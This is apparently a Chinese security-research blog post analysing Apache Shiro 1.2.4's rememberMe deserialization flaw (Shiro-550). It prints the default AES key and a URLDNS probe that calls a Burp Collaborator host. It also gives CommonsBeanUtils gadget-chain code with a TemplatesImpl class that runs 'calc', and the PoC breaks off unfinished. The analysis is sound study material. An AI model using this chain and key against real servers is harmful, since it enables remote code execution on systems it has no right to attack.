
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=true"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());

    gtag('config', 'true');
  </script>
  <!-- End Google Analytics -->


  

  
  <script async src="https://hm.baidu.com/hm.js?true"></script>
  <script data-pjax>
    var _hmt = _hmt || [];
    _hmt.push(["_trackPageview", location.pathname]);
  </script>


  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.outdate = {"enable":true,"daysAgo":180,"message":"本文最后更新于 {time}，请注意文中内容可能已经发生变化。"};</script>
  
  
  <title>
    shiro550 |
    
    yyjccc的博客
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  <meta name="description" content="shiro550简介Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API，您可以快速、轻松地获得任何应用程序，从最小的移动应用程序到最大的网络和企业应用程序。Apache Shiro基本功能点如下图所示：  Authentication：身份认证 &#x2F; 登录，验证用户是不是拥有相应的身份； Authorization：授权，">
<meta property="og:type" content="article">
<meta property="og:title" content="shiro550">
<meta property="og:url" content="https://yyjccc.github.io/2024/05/06/shiro550-md-yyj/index.html">
<meta property="og:site_name" content="yyjccc的博客">
<meta property="og:description" content="shiro550简介Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API，您可以快速、轻松地获得任何应用程序，从最小的移动应用程序到最大的网络和企业应用程序。Apache Shiro基本功能点如下图所示：  Authentication：身份认证 &#x2F; 登录，验证用户是不是拥有相应的身份； Authorization：授权，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/1.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/2.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/3.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/4.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/5.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/6.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/7.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/8.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/9.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/10.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/11.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/12.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/13.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/14.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/15.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/16.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/17.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/18.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/19.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/20.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/21.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/22.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/23.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/24.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/25.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/26.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/27.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/28.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/29.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/30.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/31.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/32.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/33.png">
<meta property="og:image" content="https://yyjccc.github.io/img/5-6/34.png">
<meta property="article:published_time" content="2024-05-05T16:41:47.441Z">
<meta property="article:modified_time" content="2024-05-05T16:43:37.126Z">
<meta property="article:author" content="Yyjccc">
<meta property="article:tag" content="java安全">
<meta property="article:tag" content="java反序列化漏洞">
<meta property="article:tag" content="shiro">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyjccc.github.io/img/5-6/1.png">
  
    <link rel="alternate" href="/atom.xml" title="yyjccc的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
    
      
<link rel="stylesheet" href="https://npm.webcache.cn/gitalk/dist/gitalk.css">

    
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

  <body>
    
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="shiro550">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">shiro550</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-shiro550-md-yyj" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2024/05/06/shiro550-md-yyj/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2024-05-05T16:41:47.441Z" itemprop="datePublished">2024-05-06</time>
    <time style="display: none;" id="post-update-time">2024-05-06</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/java%E5%AE%89%E5%85%A8/" data-aos="zoom-in">java安全</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <blockquote id="outdate-blockquote" style="display: none;"><p></p></blockquote>
      
      
        <h1 id="shiro550"><a href="#shiro550" class="headerlink" title="shiro550"></a>shiro550</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API，您可以快速、轻松地获得任何应用程序，从最小的移动应用程序到最大的网络和企业应用程序。<br>Apache Shiro基本功能点如下图所示：</p>
<ul>
<li><strong>Authentication</strong>：身份认证 / 登录，验证用户是不是拥有相应的身份；</li>
<li><strong>Authorization</strong>：授权，即权限验证，验证某个已认证的用户是否拥有某个权限；即判断用户是否能做事情，常见的如：验证某个用户是否拥有某个角色。或者细粒度的验证某个用户对某个资源是否具有某个权限；</li>
<li><strong>Session</strong> <strong>Management</strong>：会话管理，即用户登录后就是一次会话，在没有退出之前，它的所有信息都在会话中；会话可以是普通 JavaSE 环境的，也可以是如 Web 环境的；</li>
<li><strong>Cryptography</strong>：加密，保护数据的安全性，如密码加密存储到数据库，而不是明文存储；</li>
<li><strong>Web Support</strong>：Web 支持，可以非常容易的集成到 Web 环境；</li>
<li><strong>Caching</strong>：缓存，比如用户登录后，其用户信息、拥有的角色 / 权限不必每次去查，这样可以提高效率；</li>
<li><strong>Concurrency</strong>：shiro 支持多线程应用的并发验证，即如在一个线程中开启另一个线程，能把权限自动传播过去；</li>
<li><strong>Testing</strong>：提供测试支持；</li>
<li><strong>Run As</strong>：允许一个用户假装为另一个用户（如果他们允许）的身份进行访问；</li>
<li><strong>Remember Me</strong>：记住我，这个是非常常见的功能，即一次登录后，下次再来的话不用登录了；</li>
</ul>
<p>注意，本次的Shiro反序列化漏洞点就是出现在<strong>Remember Me</strong>这个功能模块</p>
<h2 id="环境部署"><a href="#环境部署" class="headerlink" title="环境部署"></a>环境部署</h2><p>shiro源码下载：<a target="_blank" rel="noopener" href="https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4">https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4</a><br>war包地址：<a target="_blank" rel="noopener" href="https://github.com/jas502n/SHIRO-550">https://github.com/jas502n/SHIRO-550</a></p>
<p>/sample/web 模块<br>配置Tomcat<br><img src="/img/5-6/1.png"><br>如果报错添加依赖</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">&lt;!--         JSTL 表达式依赖--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>javax.servlet.jsp.jstl<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>jstl-api<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.2<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--        standard--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>taglibs<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>standard<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.1.2<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<img src="/img/5-6/2.png">

<h2 id="过程调试"><a href="#过程调试" class="headerlink" title="过程调试"></a>过程调试</h2><p>进入登录页面，勾选RemeberMe进行登录<br>登录成功后，抓包，删除JSSESIONID(优先级较高)，然后调式</p>
<h3 id="加密"><a href="#加密" class="headerlink" title="加密"></a>加密</h3><p>入口是在 AbstractRememberMeManager#onSuccessfulLogin 方法<br>这里我们正向分析一下，debug打个断点，然后web登录页面输入root/secret 口令进行提交，再回到IDEA中查看</p>
<img src="/img/5-6/3.png">
继续跟进
<img src="/img/5-6/4.png">
进入AbstractRememberMeManager#convertPrincipalsToBytes
<img src="/img/5-6/5.png">
对结果对象序列化为字节数组，然后进行加密
进入encrypt，看看怎么加密
<img src="/img/5-6/6.png">
加密服务cipherService
<img src="/img/5-6/7.png">
AES-CBC模式加密，秘钥长度128位
跟进getEncryptionCipherKey（）
<img src="/img/5-6/8.png">
<img src="/img/5-6/9.png">
继续跟踪在哪里赋值的，查找用法
<img src="/img/5-6/10.png">
继续查找用法
<img src="/img/5-6/11.png">
这里加解密秘钥赋值相同，继续查找setCipherKey的用法
<img src="/img/5-6/12.png">
AbstractRememberMeManager的构造方法理面
继续查看常量
<img src="/img/5-6/13.png">
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">byte</span>[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(<span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span>);</span><br></pre></td></tr></tbody></table></figure>
发现AES加解密使用默认秘钥
shiro550一个关键点就是使用默认的秘钥
然后使用默认key进行AES加密（具体就不看了，随机生成一个初始向量......）
返回得到加密数据字符数组
<img src="/img/5-6/14.png">
跟进rememberSerializedIdentity
<img src="/img/5-6/15.png">
将AES加密后数据Base64编码写入cookie里面
getCookie，获得到cookie的一些属性设置
<img src="/img/5-6/16.png">
所以会写入cookie里面的rememberMe字段

<p>总结就是使用固定key对序列化数据进行AES加密，然后base64编码后写入cookie里面的rememberMe字段中</p>
<h3 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h3><p>shiro进行权限校验是通过Filter实现的<br>OncePerRequestFilter#doFilter<br>-&gt;AbstractShiroFilter#doFilterInternal<br>查看对应方法<br><img src="/img/5-6/17.png"><br>跟进createSubject<br><img src="/img/5-6/18.png"><br>buildSubject会调用DefaultSecurityManager中的createSubject<br><img src="/img/5-6/19.png"></p>
<img src="/img/5-6/20.png">
跟进resolvePrincipals
<img src="/img/5-6/21.png">
继续跟进
到AbstractRememberMeManager#getRememberedPrincipals
<img src="/img/5-6/22.png">
先获取cookie中序列化数据，然后再反序列化

<ol>
<li>调用父类</li>
</ol>
<p>CookieRememberMeManager#getRememberedSerializedIdentity<br><img src="/img/5-6/23.png"><br>获取cookie Remeberme字段并base64解码并返回数据<br>接着进入convertBytesToPrincipals方法<br><img src="/img/5-6/24.png"><br>解码后数据解密再反序列化<br>解密与加密对称，也是使用默认秘钥<br><img src="/img/5-6/25.png"><br>反序列化<br><img src="/img/5-6/26.png"></p>
<h2 id="利用链"><a href="#利用链" class="headerlink" title="利用链"></a>利用链</h2><h3 id="URLDNS链探测"><a href="#URLDNS链探测" class="headerlink" title="URLDNS链探测"></a>URLDNS链探测</h3><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//URLDNS.java</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">URLDNS</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception{</span><br><span class="line">        HashMap map=<span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        URL url=<span class="keyword">new</span> <span class="title class_">URL</span>(<span class="string">"http://e2hvmezvglr70to8gako0p6ycpig65.burpcollaborator.net"</span>);</span><br><span class="line"> </span><br><span class="line">        Class clazz=Class.forName(<span class="string">"java.net.URL"</span>);</span><br><span class="line">        Field hashcode=clazz.getDeclaredField(<span class="string">"hashCode"</span>);</span><br><span class="line">        hashcode.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        hashcode.set(url,<span class="number">123</span>);</span><br><span class="line"><span class="comment">//        System.out.println(hashcode.get(url));</span></span><br><span class="line">        map.put(url,<span class="string">"test"</span>);</span><br><span class="line">        hashcode.set(url,-<span class="number">1</span>);</span><br><span class="line"> </span><br><span class="line">        serialize(map);</span><br><span class="line"><span class="comment">//        unserialize("ser.bin");</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">    }</span><br><span class="line">    <span class="comment">//序列化</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> IOException {</span><br><span class="line">        ObjectOutputStream oos=<span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">"ser.bin"</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    }</span><br><span class="line"> </span><br><span class="line">    <span class="comment">//反序列化</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">unserialize</span><span class="params">(String Filename)</span> <span class="keyword">throws</span> IOException,ClassNotFoundException{</span><br><span class="line">        ObjectInputStream ois=<span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(Filename));</span><br><span class="line">        Object object=ois.readObject();</span><br><span class="line">        <span class="keyword">return</span> object;</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="没有cc依赖"><a href="#没有cc依赖" class="headerlink" title="没有cc依赖"></a>没有cc依赖</h3><p>cb链(CommonsBeanUtils1 )<br>打shiro时cb的版本为1.8.3</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;commons-beanutils&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;commons-beanutils&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;1.8.3&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></tbody></table></figure>
<h4 id="cb漏洞点"><a href="#cb漏洞点" class="headerlink" title="cb漏洞点"></a>cb漏洞点</h4><p>Apache Commons 工具集下除了 collections 以外还有 BeanUtils ，它主要用于操控 JavaBean 。</p>
<ul>
<li>以 Utils 结尾，一般这都是一个工具类/集</li>
</ul>
<p>Commons-BeanUtils 中提供了一个静态方法 PropertyUtils.getProperty ，<br>这个函数其实就是获取Bean中的某个属性的值，<br>而底层是使用反射调用了javaBean的getxxx的方法来获取值的<br>示例如下</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.PropertyUtils;  </span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CBMethods</span> {  </span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception{  </span><br><span class="line">        <span class="type">Person</span> <span class="variable">yyjccc</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>(<span class="number">666</span>, <span class="string">"yyjccc"</span>);</span><br><span class="line">        PropertyUtils.getProperty(yyjccc,<span class="string">"id"</span>);</span><br><span class="line">        PropertyUtils.getProperty(templates,<span class="string">"outputProperties"</span>);</span><br><span class="line">    }  </span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>而在前面cc3链(<a target="_blank" rel="noopener" href="https://vxxly2ajy0y.feishu.cn/wiki/UGXuwuGYyiJv1LkFHe8cxljDnce">cc3链</a> )中动态加载字节码的类TemplatesImpl中存在getOutputProperties()，且里面调用了方法newTransformer，而且刚好是javabean的getxxx</p>
<h4 id="链子分析"><a href="#链子分析" class="headerlink" title="链子分析"></a>链子分析</h4><p>我们的链子<br><em>PropertyUtils.getProperty函数中会掉到这里</em><br><img src="/img/5-6/27.png"><br>进入getSimpleProperty函数，在这个函数中会使用getxxx函数<br><img src="/img/5-6/28.png"><br>TemplatesImpl中存在getOutputProperties()<br><img src="/img/5-6/29.png"><br>触发newTransformer,从而动态加载了字节码，因为getProperty加载的是get，直接传outputProperties</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">PropertyUtils.getProperty(templates,"outputProperties");</span><br></pre></td></tr></tbody></table></figure>

<ul>
<li>查找getProperty的调用点</li>
</ul>
<p>在BeanComparator中的compare方法就刚刚好<br><img src="/img/5-6/30.png"></p>
<ul>
<li>继续寻找，其实cc2中就有compare，参考cc2中的入口类</li>
</ul>
<p>使用PriorityQueue，需要传入一个comparetor，<br>这里直接传BeanComparator，并初始化设置属性property为outputProperties，为了触发getOutputProperties方法<br><img src="/img/5-6/31.png"></p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">BeanComparator&lt;Object&gt; objectBeanComparator = new BeanComparator&lt;&gt;("outputProperties");</span><br><span class="line">PriorityQueue&lt;Object&gt; priorityqueue = new PriorityQueue&lt;&gt;(objectBeanComparator);</span><br></pre></td></tr></tbody></table></figure>
<p>这样写是不行的，</p>
<ul>
<li>首先解决序列化时候报错</li>
</ul>
<img src="/img/5-6/32.png">
这是因为在调用add的时候，就会触发该类的compare方法，来寻找该类了，因此就只能通过反射修改
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">Class c = transformingComparator.getClass();</span><br><span class="line">Field tfactoryfeild = c.getDeclaredField("transformer");</span><br><span class="line">tfactoryfeild.setAccessible(true);</span><br><span class="line">tfactoryfeild.set(transformingComparator,invokerTransformer);</span><br></pre></td></tr></tbody></table></figure>
若new的时候传入使用CC2中的comparator，也样也不行，虽然序列化成功，但在打shiro的时候不会成功
这是因为我们使用这个构造方法时，使用了common-collection3包里面的函数，而shiro默认没有cc依赖，因此会出错
<img src="/img/5-6/33.png">
那么只有换个构造方法，使用这个，我们需要传入一个comparartor
<img src="/img/5-6/34.png">
随便找一个Comparator类
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line">BeanComparator&lt;Object&gt; objectBeanComparator = <span class="keyword">new</span> <span class="title class_">BeanComparator</span>&lt;&gt;(<span class="string">"outputProperties"</span>,<span class="keyword">new</span> <span class="title class_">AttrCompare</span>());</span><br></pre></td></tr></tbody></table></figure>
恶意类
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test</span> <span class="keyword">extends</span> <span class="title class_">AbstractTranslet</span>{</span><br><span class="line">    <span class="keyword">static</span> {</span><br><span class="line">        <span class="keyword">try</span> {</span><br><span class="line">            Runtime.getRuntime().exec(<span class="string">"calc"</span>);</span><br><span class="line">        } <span class="keyword">catch</span> (IOException e) {</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, SerializationHandler[] handlers)</span> <span class="keyword">throws</span> TransletException {</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">transform</span><span class="params">(DOM document, DTMAxisIterator iterator, SerializationHandler handler)</span> <span class="keyword">throws</span> TransletException {</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
#### 最后poc
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> org.example;</span><br><span class="line"><span class="keyword">import</span> beans.Person;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.BeanComparator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.comparators.TransformingComparator;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections4.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Files;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Paths;</span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">cb</span> {</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception {</span><br><span class="line">        <span class="comment">//CC3</span></span><br><span class="line">        <span class="type">TemplatesImpl</span> <span class="variable">templates</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TemplatesImpl</span>();</span><br><span class="line">        Class c1=templates.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">namefield</span> <span class="operator">=</span> c1.getDeclaredField(<span class="string">"_name"</span>);</span><br><span class="line">        namefield.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        namefield.set(templates,<span class="string">"aaa"</span>);</span><br><span class="line">        Field bytecodes=c1.getDeclaredField(<span class="string">"_bytecodes"</span>);</span><br><span class="line">        bytecodes.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">byte</span> [] code= Files.readAllBytes(Paths.get(<span class="string">"D:\\coderesp\\java\\learn\\exp\\target\\classes\\org\\example\\test.class"</span>));</span><br><span class="line">        <span class="type">byte</span>[][] codes={code};</span><br><span class="line">        